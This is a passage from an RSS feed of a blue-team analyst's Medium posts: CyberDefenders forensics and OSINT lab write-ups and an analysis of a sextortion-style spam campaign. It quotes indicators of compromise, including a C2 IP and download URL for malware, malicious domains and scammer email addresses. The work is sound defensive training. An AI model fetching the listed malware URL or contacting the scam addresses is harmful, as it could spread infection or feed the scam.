program cannot be run in DOS mode.<br>RichH<br>.text<br>.data<br>.idata<br>@.rsrc<br>@.reloc<br>allsafe_protector.exe<br>svchost.exe<br>iexplore.exe<br>explorer.exe</pre><p>allsafe_protector.exe.</p><h4>Question 24</h4><p>Machine:POS What is the name of the file the malware was initially launched from?</p><h4>Answer 24</h4><p>I actually found this answer accidentally before I found the previous one, using strings on the malware for the first time, I used the -el command and it gave me this:</p><pre>$ strings -el process.0x83f324d8.0x50000.dmp  <br>s%s\%s<br>%s\%s\%s.exe<br>\Internet Explorer\iexplore.exe<br>jjjjjjjjh<br>jjjj<br>jjjj<br>jjjj<br>jjjj<br>jjjh<br>Digit<br>.exe<br>tor.exe<br>C:\Program Files\Internet Explorer\iexplore.exe<br>8bc0f102-b56a-4de9-9832-137a2cf08295<br>C:\Users\pos\AppData\Roaming\kdcpr\kdcpr.exe<br>C:\Users\pos\Downloads\allsafe_update.exe</pre><p>allsafe_update.exe in the downloads folder. Which could indicate the initial launch vector. I could have also used the iehistory plugin to find this:</p><pre>$ python2 vol.py -f dump/pos.vmss --profile=Win7SP1x86_23418 iehistory<br>Process: 1836 explorer.exe<br>Cache type &quot;URL &quot; at 0x1db5600<br>Record length: 0x100<br>Location: :2015100920151010: pos@http://54.84.237.92/allsafe_update.exe<br>Last modified: 2015-10-09 08:35:57 UTC+0000<br>Last accessed: 2015-10-09 12:35:57 UTC+0000<br>File Offset: 0x100, Data Offset: 0x0, Data Length: 0x0<br>**************************************************<br>Process: 1836 explorer.exe<br>Cache type &quot;DEST&quot; at 0x510182b<br>Last modified: 2015-10-09 08:35:57 UTC+0000<br>Last accessed: 2015-10-09 12:35:58 UTC+0000<br>URL: pos@http://54.84.237.92/allsafe_update.exe<br>**************************************************<br>Process: 1836 explorer.exe<br>Cache type &quot;DEST&quot; at 0x5101b93<br>Last modified: 2015-10-09 08:35:57 UTC+0000<br>Last accessed: 2015-10-09 12:35:58 UTC+0000<br>URL: pos@http://54.84.237.92/allsafe_update.exe</pre><p>The URLs match up with the C2 servers IP address. Meaning the allsafe_update.exe is the original malware.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/481/1*IAABV7bXsSyQ5DaH4kM-dA.png" /><figcaption>Lab complete!</figcaption></figure><p>This was a tough lab, I needed a couple of nudges in the right direction near the end of the lab. But overall I did learn a few things and it was a rewarding experience!</p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=a0a33d877fc7" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Intel101 Lab Writeup]]></title>
            <link>https://medium.com/@JawsZero/intel101-lab-writeup-e2dcf3024a78?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/e2dcf3024a78</guid>
            <category><![CDATA[threat-intelligence]]></category>
            <category><![CDATA[cyberdefender]]></category>
            <category><![CDATA[blue-team]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[cyberdefenders-writeup]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Mon, 03 Nov 2025 21:46:03 GMT</pubDate>
            <atom:updated>2025-11-03T21:46:03.673Z</atom:updated>
            <content:encoded><![CDATA[<h4>CyberDefenders Threat Intel Lab</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/945/1*zCNZxgqtimP3yLV771ePYg.png" /></figure><h4>Scenario</h4><p>This exercise focuses on Open-Source Intelligence (OSINT) as a method for mining and analyzing publicly available data. It aims to enhance skills in producing valuable insights when investigating external threats in the role of a security blue team analyst. Through practical application, participants will learn to effectively gather and interpret information to improve overall security measures.</p><h4>Question 1</h4><p>Who is the Registrar for jameskainth.com?</p><h4>Answer 1</h4><p>A Whois search revelaed NameCheap is the registrar.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/431/1*dijiNroCwN1cGxuqryRyqg.png" /></figure><h4>Question 2</h4><p>What is the Zoom meeting id of the British Prime Ministers Cabinet Meeting?</p><h4>Answer 2</h4><p>Using the phrase “Zoom meeting ID of the British Prime Ministers Cabinet Meeting” on a search engine gave me a few news article detailing what happened.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/677/1*KNYVEl7-vMqKs6D1JRbPIw.png" /></figure><h4>Question 3</h4><p>In 1998 specifically on February 12th, Champlain was planning on adding an exciting new building to its campus. Back then, it was called “The Information Commons”. Can you find a picture of what the inside would look like? Submit the SHA256 hash.</p><h4>Answer 3</h4><p>Using the way back machine I was able to find a single capture on February 12th 1998.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K1_kl4CmQA19gANpJaCIZw.png" /></figure><pre>└─$ shasum -a 256 inside1.jpg                          <br>f4952b314eb15acf0eec79c954f83881c17d50d2b5922ee37e8fc5e5cd1aeac2  inside1.jpg</pre><h4>Question 4</h4><p>In 2019 UVM’s Ichthyology Class Had to Name their fish for class. Can you find out what the last person on the public roster named their fish?</p><h4>Answer 4</h4><p>Using the wayback machine once again, I was able to uncover a Excel spreadsheet with fish names.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cktGTWY4kvrmrBz5pBhkoA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/436/1*yyGSERXgqiEIuAPA1xmZsg.png" /></figure><h4>Question 5</h4><p>Can you identify the state from which this picture was taken? See the attached photo.</p><h4>Answer 5</h4><p>I used Google’s Image search to try and find where the photo was taken. Using their AI it managed to pin point Dinosaur Land in White Post Virginia.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/719/1*fddkKOSTE4wjN4lO3VDOjA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/476/1*0CX_hUjbZVFI9qns_184lQ.png" /><figcaption>Lab Complete!</figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=e2dcf3024a78" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Malicious Spam Campaigns]]></title>
            <link>https://medium.com/@JawsZero/malicious-spam-campaigns-7ef9bf517c96?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/7ef9bf517c96</guid>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[email-spam]]></category>
            <category><![CDATA[blue-team]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Sun, 02 Nov 2025 18:23:20 GMT</pubDate>
            <atom:updated>2025-11-02T18:23:20.725Z</atom:updated>
            <content:encoded><![CDATA[<h4>Analyzing a malicious spam campaign that I have encountered.</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/307/1*Qgml57w11PAq8bnAPA0sGA.png" /></figure><h4>Malicious P*rnHub Spam Campaign</h4><p>The first email I am going to take a look at has the subject line:</p><blockquote>To STOP receiving these emails from us just hit reply and let us Know !!</blockquote><p>Indicators:</p><ul><li>No logo</li><li>Strange subject line</li><li>Needing to reply to an email to stop receiving them</li><li>Reply address</li><li>No links</li><li>No attachments</li></ul><p>This is super strange. I have never seen spam emails that don’t have any sort of malicious links or attachments. Instead the spammer wants you to click on 1 of 2 buttons that direct the victim to reply to a TON of emails.</p><pre>mailto:support@schwambach.net;admin@libertejuive.me;admin@haikuo.me;lisapsparks122@gmail.com;monicaamden8@gmail.com;media=<br>market770@gmail.com;makroobmin0@gmail.com;sauermisael272@gmail.com;adanweissnat550@gmail.com;pouroskamryn@gmail.com;stephenmsmith111@gmail.com;aquisto=<br>n09@gmail.com;hilaliofchsor@gmail.com;mongolis454@gmail.com;kolamipaprat@gmail.com;dhasanhasanin@gmail.com;shayoojulie@gmail.com;bbb1234hh5@gmail.com;=<br>o12866788542234@gmail.com;o49485114@gmail.com;alinasorkova497@gmail.com;o78372923@gmail.com;hiyo73404@gmail.com;boitajdiiida@gmail.com;yohello119@gmai=<br>l.com;habalstdophabala@gmail.com;farenukvova@gmail.com;rebeccafriffin@gmail.com;sykescallum060@gmail.com;c.smithmatthew@gmail.com;kabyalaabsabs@gmail.=<br>com;dreda4488@gmail.com;luskmirian@gmail.com;edwaardavis@outlook.com;abdoalam644@gmail.com;hodgesantonio11@gmail.com;chiwchiw723@gmail.com;herrodvinni=<br>e443@gmail.com;wchtabreerd@gmail.com;kamronnatalia661@gmail.com;oliviaprince488@gmail.com;ethandaviss@outlook.com;sabmlevspec@onet.pl;sfigaoprgovisovu<br>@onet.pl;stepan.dolgoruk496@yandex.ru;slobodyanyuk.83287@yandex.ru;sanych1959942@yandex.ru;mariabugaeva24571@yandex.ru;alla.rykodelnica648@yandex.ru;amanigio@aliyun.com</pre><p>It uses <em>mailto: </em>and sets the subject line as “Unsubscribe P*rnHub”. This is all hidden behind a simple button. There are 2 of these, one of which is so “confirm” your sub, the second is to “cancel” your sub. This very much plays on peoples perhaps nervousness when dealing with adult content.</p><p>The email domains that I have an interest in are as follows:</p><pre>schwambach.net<br>libertejuive.me<br>haikuo.me<br>onet.pl<br>aliyun.com</pre><p>The rest are either, Gmail, Outlook or Yandex emails. More on these domains later. I want to go over the rest of the email for additional clues.</p><p>Another thing that stuck out to me was the actual senders address. Using <a href="https://app.phishtool.com/">phishtool.com</a> I was able to quickly look over the various interesting details without having to scrub through it manually. The return path was a valid address, which was odd to me. Since a lot of the time spam emails try and spoof. But this was from a Firebase app.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/449/1*W4OkmXU3BxwGmX-Ds2zXaw.png" /></figure><p>Firebase is Google’s mobile and web app development platform. Sadly the site had not been set up yet.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/782/1*VwObRK8jW-Zr-2UP-eZ5lA.png" /></figure><p>Because it was a valid address, the spammer would have gotten around SPF and DKIM checks. Now to look into the URLs that the email has you reply to.</p><pre>schwambach.net</pre><p>The above URL leads to a index of page. The IP is located in Paris France and was registered via NameCheap. Searching for that IP address it seems its being used by a variety of other domains.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1017/1*NmQkf-M3GuLGG4KvKaQFJg.png" /></figure><p>3 of which I have already seen:</p><pre>schwambach.net<br>libertejuive.me<br>haikuo.me</pre><p>So these 3 are connected via the same server. The following are old results from the same IP address that had been scanned in the past:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/586/1*z_3tNQpJIVTFUGuaTseG1w.png" /></figure><p>You can guess the content of these website, just judging by the name. So to me currently, this looks like an old phishing/malicious server being used for a new scam. The IP address is also being tracked of VirusTotal. The various URLs that are connected with the above IP addresses are a ton of malicious content, which seems to be a lot of drive-by downloads.</p><p>There were 2 other domains that are also listed within the email:</p><pre>@onet.pl<br>@aliyun.com</pre><p>The first one, onet.pl seems to be a Polish news website that, according to wiki, reaches 42% of Polish internet users every week. A very strange thing to include in the spam email, perhaps the 2 emails that end in onet.pl are compromised somehow?</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/863/1*1BOG9XxhJP3CDQgTjwL6fw.png" /></figure><p>Both of those onet.pl emails exist and are valid. Which does lead me to believe they might be compromised somehow. I have contacted the website to see if they are aware of such an issue.</p><p>The last URL that I wanted to look into was:</p><pre>aliyun.com</pre><p>This didn’t take much research, it turned out to be Alibaba’s cloud computing company. Sort of a dead end, a rather strange dead end.</p><p>This was an odd spam email, that relies on someones embarrassment of adult content in order to trick them into replying to the list of email addresses above. Not really knowing the rest, I would imagine the scam would start after the first reply, potentially black mail, or even a link to a URL to “cancel” your subscription. Tricking the email client into placing the correspondence into the inbox itself, not the spam box. Thus giving a slight air of authenticity.</p><h4>Recommendations</h4><p>Block the following email domains:</p><pre>schwambach.net<br>libertejuive.me<br>haikuo.me</pre><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=7ef9bf517c96" width="1" height="1" alt="">]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Sysinternals Lab Writeup]]></title>
            <link>https://medium.com/@JawsZero/sysinternals-lab-writeup-ad2a5168e12c?source=rss-2b3674ca8ff1------2</link>
            <guid isPermaLink="false">https://medium.com/p/ad2a5168e12c</guid>
            <category><![CDATA[cyberdefender]]></category>
            <category><![CDATA[soc-analyst]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <category><![CDATA[cyberdefenders-writeup]]></category>
            <category><![CDATA[blue-team]]></category>
            <dc:creator><![CDATA[Jaws]]></dc:creator>
            <pubDate>Thu, 30 Oct 2025 17:47:31 GMT</pubDate>
            <atom:updated>2025-10-30T17:47:31.103Z</atom:updated>
            <content:encoded><![CDATA[<h4>CyberDefenders Endpoint Forensics Lab</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/966/1*BgZd0DE0J777DIsHbsywSA.png" /></figure><h4>Scenario</h4><p>A user thought they were downloading the SysInternals tool suite and attempted to open it, but the tools did not launch and became inaccessible. Since then, the user has observed that their system has gradually slowed down and become less responsive.</p><h4>Question 1</h4><p>What was the malicious executable file name that the user downloaded?</p><h4>Answer 1</h4><p>Navigating through the file system in FTK Imager I was able to find the download that was mentioned in the above scenario.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/630/1*bUJwvMaHOqHKkGZ8iUtDRg.png" /></figure><h4>Question 2</h4><p>When was the last time the malicious executable file was modified?</p><h4>Answer 2</h4><p>While the timestamp is in a 12 hour clock format, the answer requires a 24 hour clock format.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/641/1*3_3kaf_5OGN2_Mc03Hgi1A.png" /></figure><h4>Question 3</h4><p>What is the SHA1 hash value of the malware?</p><h4>Answer 3</h4><p>Right clicking on the malware and exporting the hash is a clean safe way of obtaining a SHA1 hash value. This also allows you to look it up on VirusTotal. However this wasn’t the case here. I needed to look into the Amcache file that records exes that were executed on the system. Using Eric Zimmerman’s <a href="https://ericzimmerman.github.io/#!index.md">AmcacheParser</a> to convert the hve file to a csv. Giving me the following:</p><pre>2022-11-15 21:19:01,fa1002b02fc5551e075ec44bb4ff9cc13d563dcf,False,c:\users\public\downloads\sysinternals.exe,SysInternals.exe</pre><h4>Question 4</h4><p>Based on the Alibaba vendor, what is the malware’s family?</p><h4>Answer 4</h4><p>Now I can take the SHA1 hash to VirusTotal:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*iKVW1w5eImtlVxBFL2MgIA.png" /></figure><h4>Question 5</h4><p>What is the first mapped domain’s Fully Qualified Domain Name (FQDN)?</p><h4>Answer 5</h4><p>Looking under the relations tab reveals the answer:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/789/1*MUKoqwxD9VG8bSexzrj0tA.png" /></figure><h4>Question 6</h4><p>The mapped domain is linked to an IP address. What is that IP address?</p><h4>Answer 6</h4><p>There was one place that sprung to mind when thinking about IP addresses and where they can be stored in the Windows file system. The host file.</p><p>Navigating to the following, I was able to obtain the IP address of the URL above:</p><pre>Windows/System32/drivers/etc/hosts</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*IcAziMwBF8zBc3xqWKgJUQ.png" /></figure><h4>Question 7</h4><p>What is the name of the executable dropped by the first-stage executable?</p><h4>Answer 7</h4><p>Looking through the VirusTotal page on the behavior tab you can find that the malware drops another exe file, vmtoolsio.exe.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/466/1*RuFEQ583Eaf8cy_o_DdYgw.png" /></figure><h4>Question 8</h4><p>What is the name of the service installed by 2nd-stage executable?</p><h4>Answer 8</h4><p>In the same command line its clear that the service started is VMwareIOHelperService:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1011/1*Z5z8fF3MZj-FPNpdVw8hlA.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/485/1*ulH6FMZdUS1mO6gFRwKt7w.png" /><figcaption>Lab complete!</figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=ad2a5168e12c" width="1" height="1" alt="">]]></content:encoded>
        </item>
    </channel>
</rss>